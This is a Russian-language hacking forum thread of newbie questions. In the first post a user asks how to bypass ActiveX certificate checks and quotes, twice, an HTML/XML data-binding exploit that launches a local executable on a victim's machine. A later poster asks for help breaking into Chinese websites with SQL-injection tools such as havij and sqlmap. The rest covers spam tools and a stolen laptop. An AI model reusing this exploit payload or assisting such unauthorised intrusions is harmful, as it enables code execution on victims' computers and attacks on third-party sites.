Задавайте здесь ваши вопросы.
P.S: Не рекомендуется задавать вопросы, ответы на которые можно легко найти в поиске ;)
Друзья: Всё для вебмастера | [ Реклама на форуме ] |
3
Вопросы новичков
Автор
aka PSIH
, 30 Nov 2008 04:40
Отправлено 30 November 2008 - 11:39
Как обойти проверку сертификата ActiveX при загрузке страницы? Нашел только об уязвимости, которая позволяет запускать программы на ПК жертвы...
Этот вопрос я задавал 2 разаи мне никто не ответил!
Цитата
Рассмотрим известный пример уязвимости найденной в марте 2002 года, и присутствующей практически во всех версиях операционных систем и браузеров:
Код
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/WINDOWS/calc.exe"></object>
]]></exploit></security>
</xml>
Данная уязвимость позволяет запускать любые программы на машине пользоваетля (если известен локальный путь к ним).
Код
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/WINDOWS/calc.exe"></object>
]]></exploit></security>
</xml>
Данная уязвимость позволяет запускать любые программы на машине пользоваетля (если известен локальный путь к ним).
Отправлено 30 November 2008 - 13:01
Цитата
Как обойти проверку сертификата ActiveX при загрузке страницы?
Цитата
Нашел только об уязвимости, которая позволяет запускать программы на ПК жертвы...
Everything that was made by human is possible to crack => ideal protection does not exist
Отправлено 16 May 2009 - 10:21
SpeedTor
Тут задаются вопросы по хакингу, а не по доргенам!
Тут задаются вопросы по хакингу, а не по доргенам!
Отправлено 22 November 2010 - 13:22
*КРОТ#
авторегер и спамер есть, брута не видел.
авторегер и спамер есть, брута не видел.
Отправлено 28 January 2015 - 12:05
Можно ли найти украденный ноутбук?
Ноут украден на территории дачного поселка. Рядом только один интернет провайдер (кроме мобильных, но врятли воры ими воспользуются)
Ментам судя по всему наплевать. Продавать (или в скупку) тоже врятли станут, во первых ноут приметный (да и не из дешевых), во вторых в поселке все знают о "пропаже", а в райцентре у меня много знакомых, в т.ч. и в магазинах, ремонтных мастерских и даже в ломбардах, а в другой город думаю тоже врятли попрут (хотя конечно бывает все).
Есть хоть какие то шансы?
P.S.
Думаю продавать нестанут, а вот пользоваться втихую вероятней всего будут
Ноут украден на территории дачного поселка. Рядом только один интернет провайдер (кроме мобильных, но врятли воры ими воспользуются)
Ментам судя по всему наплевать. Продавать (или в скупку) тоже врятли станут, во первых ноут приметный (да и не из дешевых), во вторых в поселке все знают о "пропаже", а в райцентре у меня много знакомых, в т.ч. и в магазинах, ремонтных мастерских и даже в ломбардах, а в другой город думаю тоже врятли попрут (хотя конечно бывает все).
Есть хоть какие то шансы?
P.S.
Думаю продавать нестанут, а вот пользоваться втихую вероятней всего будут
Отправлено 28 January 2015 - 18:49
Не буду ходить вокруг да около - Шансов нет.
Максимум можно отыскать по мак адресу, но я сомневаюсь что вы его знаете.
Максимум можно отыскать по мак адресу, но я сомневаюсь что вы его знаете.
Отправлено 28 July 2017 - 01:23
Привет всем !
Ребята помогите разобраться в такой фишке со взломом китайских сайтов: часто найду уязвимые китайские сайты, как начинаю процесс взлома с havij,sqldumper,webcruiser,sqlmap и тп всегда одно и то же проблема, програмы найдут что уязвимость например Integer, кейворд вот такой то, но не может найти базу, всегда эта проблема,, я думаю тут проблема в китайских буквах наверное что программы не могут читать имя базы данных.
Кто что может советовать, помочь разобраться.
Заранее спасибо)
Ребята помогите разобраться в такой фишке со взломом китайских сайтов: часто найду уязвимые китайские сайты, как начинаю процесс взлома с havij,sqldumper,webcruiser,sqlmap и тп всегда одно и то же проблема, програмы найдут что уязвимость например Integer, кейворд вот такой то, но не может найти базу, всегда эта проблема,, я думаю тут проблема в китайских буквах наверное что программы не могут читать имя базы данных.
Кто что может советовать, помочь разобраться.
Заранее спасибо)
Количество пользователей, читающих эту тему: 0
0 пользователей, 0 гостей, 0 анонимных